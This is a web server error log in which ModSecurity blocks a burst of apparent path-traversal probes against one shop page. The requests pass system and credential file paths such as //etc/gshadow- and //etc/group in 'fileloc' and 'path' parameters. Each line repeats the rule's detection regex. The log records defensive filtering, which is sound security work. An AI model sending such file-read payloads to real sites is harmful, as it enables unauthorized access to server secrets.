[Thu Mar 19 16:05:49.254645 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.98:59440] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJC-oXxyEfFpUF8f8xVQAAAUM"]
[Thu Mar 19 16:05:49.291873 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.60:59472] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJDRCii7xarUs8iHYO_AAAAgQ"]
[Thu Mar 19 16:05:49.625149 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.28:59480] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJDfXLqtnMIWvjpaJDNwAAApI"]
[Thu Mar 19 16:05:49.655557 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.119:59484] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJDda6ubjKNq_cu4Z6xgAAA1g"]
[Thu Mar 19 16:05:50.968287 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.40:59510] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJDuoXxyEfFpUF8f8xVgAAAUM"]
[Thu Mar 19 16:05:51.538364 2026] [:error] [pid 21563:tid 140411716749056] [client 57.141.18.3:59528] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJD0pm7ZmxKZTM4bZpVQAAA4M"]
[Thu Mar 19 16:05:51.748783 2026] [:error] [pid 27293:tid 140411616036608] [client 57.141.18.71:59532] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJD_-YZRR_7pZ7nDKvrgAAA88"]
[Thu Mar 19 16:05:52.169132 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.71:59544] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJENa6ubjKNq_cu4Z6yAAAA1I"]
[Thu Mar 19 16:05:53.132934 2026] [:error] [pid 19655:tid 140411632822016] [client 57.141.18.54:59568] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJEU1ujooLWdUDGy75vwAAAE0"]
[Thu Mar 19 16:05:53.560366 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.32:59580] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJEeoXxyEfFpUF8f8xWAAAAU8"]
[Thu Mar 19 16:05:54.708248 2026] [:error] [pid 21219:tid 140411574073088] [client 57.141.18.11:59608] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJEvXLqtnMIWvjpaJDPQAAApQ"]
[Thu Mar 19 16:05:55.085985 2026] [:error] [pid 5816:tid 140411641214720] [client 57.141.18.118:59620] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJE5fmNfuxceSuAEK6MQAAAcw"]
[Thu Mar 19 16:05:56.332519 2026] [:error] [pid 27293:tid 140411540502272] [client 57.141.18.32:59646] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJFP-YZRR_7pZ7nDKvsAAAA9g"]
[Thu Mar 19 16:05:56.679763 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.44:59652] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJFPqxLDW4GITHUkSNpQAAAQM"]
[Thu Mar 19 16:05:57.180918 2026] [:error] [pid 17887:tid 140411624429312] [client 57.141.18.74:59670] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJFQkwaGbbGflqUZDwBAAAAM4"]
[Thu Mar 19 16:05:57.878562 2026] [:error] [pid 5816:tid 140411641214720] [client 57.141.18.11:59688] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJFZfmNfuxceSuAEK6MwAAAcw"]
[Thu Mar 19 16:05:57.893251 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.66:59690] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJFeoXxyEfFpUF8f8xWQAAAU8"]
[Thu Mar 19 16:05:59.609963 2026] [:error] [pid 17887:tid 140411624429312] [client 57.141.18.68:59726] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJFwkwaGbbGflqUZDwBgAAAM4"]
[Thu Mar 19 16:05:59.740438 2026] [:error] [pid 8307:tid 140411624429312] [client 57.141.18.50:59732] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJF7-FhjpZGs9ba8qPagAAAw4"]
[Thu Mar 19 16:05:59.783380 2026] [:error] [pid 8307:tid 140411624429312] [client 57.141.18.81:59736] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJF7-FhjpZGs9ba8qPawAAAw4"]
[Thu Mar 19 16:06:00.669170 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.53:59754] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJGPXLqtnMIWvjpaJDSQAAAoM"]
[Thu Mar 19 16:06:01.811464 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.12:59784] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJGfXLqtnMIWvjpaJDTAAAApI"]
[Thu Mar 19 16:06:01.812824 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.62:59786] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJGda6ubjKNq_cu4Z6zQAAA1g"]
[Thu Mar 19 16:06:02.578864 2026] [:error] [pid 5816:tid 140411658000128] [client 57.141.18.44:59802] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJGpfmNfuxceSuAEK6NQAAAco"]
[Thu Mar 19 16:06:02.897812 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.41:59808] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJGv-YZRR_7pZ7nDKvtQAAA9E"]
[Thu Mar 19 16:06:03.194078 2026] [:error] [pid 5816:tid 140411649607424] [client 57.141.18.121:59818] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJG5fmNfuxceSuAEK6NgAAAcs"]
[Thu Mar 19 16:06:03.520614 2026] [:error] [pid 5816:tid 140411658000128] [client 57.141.18.109:59822] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJG5fmNfuxceSuAEK6NwAAAco"]
[Thu Mar 19 16:06:04.226121 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.67:59834] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJHNa6ubjKNq_cu4Z6zgAAA1g"]
